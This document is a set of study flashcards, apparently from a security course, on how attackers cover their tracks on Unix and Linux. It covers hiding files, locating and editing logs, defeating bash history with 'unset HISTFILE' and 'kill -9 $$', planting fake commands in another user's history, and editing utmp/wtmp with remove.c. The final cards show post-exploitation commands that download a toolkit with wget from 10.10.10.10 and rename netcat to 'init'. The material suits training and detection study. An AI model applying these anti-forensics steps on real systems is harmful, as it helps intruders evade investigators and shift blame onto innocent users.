Book 5: Covering Tracks on Unix and Linux Flashcards
Following an initial compromise, attackers will take steps to hide their presence on systems to avoid detection?
true
What steps will attackers take to avoid detection?
- removing artifacts following an exploit
- changing logs to remove evidence
- creating subtle hiding spaces to keep files as they collect data and pillage
What are the 3 goals of an attacker?
- compromise the target
- achieve post exploitation goal
- evade detection for as long as possible
What is the easiest way to hide files on UNIX?
name it “.” or “..”
or “…” or “ “
Easiest way to hide a file in UNIX is to name the file with a dot?
yes.
This wouldn't be necessary if the attacker had a rootkit or kernel-mode rootkit technique / root access, but in this case he does not.
Every directory has at least two other directory entries:
.. refers to the parent directory
. refers to the current directory
What are the 3 popular locations to hide files in UNIX?
/dev
/tmp
/etc
or
/usr/local/man
/usr/src
/dev
directory contains information about devices on the system, such as chunks of your hard drive and references to terminals. A good place to hide files.
/tmp
often contains strangely named files created by various apps to temporarily store data
The /tmp directory is emptied on reboot?
true.
Files stored in /tmp would need to be restored?
yes, it is a location emptied on reboot.
/etc
A bad place to hide files. It holds machine configuration and is carefully monitored by sys admins.
What are the two increasingly popular locations to store/hide data?
/usr/local/man
and
/usr/src
Main log files can be found by viewing the ___?
/etc/syslog.conf
How can attackers find where logs are located on a UNIX system?
Check /etc/syslog.conf, by just checking this location or by running a script that guesses where the logs are.
The __ process stores the logs for the machine?
syslog
The configuration for the system logger is found in the ____ file.
/etc/syslog.conf file
If using a log-clearing script to guess the location of the logs, it can malfunction due to __
Running the script on an improper version of Linux, or the logs not being stored in their default location.
Once you find out where the logs are located by checking the __ file, you know that they are mainly stored in which directory?
/etc/syslog.conf
/var/log
Several flavors of Linux store their system logs in the ___ directory.
/var/log
Web servers (HTTP) store their logs within their own directories?
true
Almost all logs within /var/log are stored in ASCII?
Yes, so they can be edited with vi or nano. An attacker can and will delete these entries.
What logs are of particular interest to an attacker?
/var/log/secure
/var/log/messages
Logs written in /var/log are in ASCII?
yes
Which logs of a particular service (the one exploited to gain access) are of interest?
/var/log/httpd/error.log
/var/log/httpd/access.log
Logs written in /var/log are usually edited by?
Hand, because they are ASCII; they can also be edited via script.
The __ where you type a command has the option of recording each command.
shell
By default the __ __ included in Linux stores the most recent x commands typed in.
bash shell
By default the bash shell keeps track of the last __ commands, although __ on some Linux distros.
500
1,000
The bash history is written in ASCII and can be edited by hand?
true.
Both bash history and the /var/log files are written in ASCII and can be edited by hand?
true
What can an attacker do to the bash history to make it look like someone else did something?
Since the file is ASCII, an attacker can plant fake commands into another user's bash history file to divert attention during an investigation.
How can an attacker divert investigation?
Plant false commands in another user's history file.
What are the problems with shell history?
You won't see your most recent commands, because the shell history is written when the shell is exited; until then the commands are stored in RAM.
Shell history is written when the shell is ___?
exited
You won't see your most recent commands in the shell history because?
The shell history is written when the shell is exited.
Most recent commands that would be in the shell history are stored in __ until the __ is exited
RAM
Shell
If an attacker invoked the shell and typed vi .bash_history, would this command show up in the shell history file?
yes
What is an unsuccessful way to try and conceal entries in the bash history?
edit the shell history file
exit the shell
start another shell
edit the history file again to remove the editing command
BUT there is a "chicken and egg" problem: the editing command itself will be added again.
What are the two widely known solutions to removing entries from bash history?
- Killing the shell so that it cannot write the most recent shell history, including the commands used to edit it
- changing the environment variable HISTFILE
How would I kill the bash shell?
kill -9 [pid]
How do I kill all bash shells?
killall -9 bash
The second method of removing entries from bash history is __, and the command is: $ unset __ then __ __ __
changing the environment variable HISTFILE
$ unset HISTFILE then kill -9 $$
What is the 3rd option to removing entries from bash history?
Adding a space before the command in bash so that specific commands are not logged.
What are the accounting entries in UNIX?
utmp
wtmp
btmp
lastlog
Which file contains info about currently logged-in users?
utmp
Default location of utmp?
/var/run/utmp
Which file contains data about past user logins?
wtmp
Which file contains bad login entries for failed login attempts?
btmp
Default location of wtmp?
/var/log
Default location of btmp?
/var/log/btmp
Which file shows the login name, port, and last login time for each user?
lastlog
Default location of lastlog?
/var/log/lastlog
What are the default locations of accounting entries in UNIX?
/var/run/utmp
/var/log/wtmp
/var/log/btmp
/var/log/lastlog
What is the only accounting log not stored within /var/log?
utmp
/var/log/utmp
What command will print a list of all users currently actively logged in on the system?
$who
The btmp file is usually configured to be turned off because sys admins don't want to leave the file sitting around with bad ID attempts, because it could contain passwords?
true
The accounting entry files are stored in ASCII?
FALSE
How are the accounting entries stored in UNIX?
utmp structures
Accounting entries are stored as __ structures
utmp
Both bash history and the /var/log files are written in ASCII and can be edited by hand, BUT the accounting entries (utmp, wtmp, btmp) are not and are stored as ___?
utmp structures
To edit the accounting files you have to use specialized tools, or else __?
The files will become corrupted.
The accounting entries will become corrupted if you try and edit them without the proper tool?
yes
What specialized tool can edit the accounting files?
remove.c
___.c can edit utmp, wtmp, btmp and lastlog because they are stored in a specialized format called ___ ___
remove.c
utmp structures
$whoami
- Checking to see which account they have gained control of on the machine; could be checking for root privileges.
$id
Gets more details about the ID number and the groups associated with the current account.
$uname -a
Detailed kernel version the system is running.
Useful for further exploiting the system or for getting an idea of the types of Linux machines the target organization is using.
$nc
Checking to see if netcat is installed on the path for the account.
$wget 10.10.10.10/kitz.tgz
The wget tool can download web pages; here it is used to pull a file from a machine.
$mv nc init
Moving (renaming) a file called nc to a file called init, therefore blending in.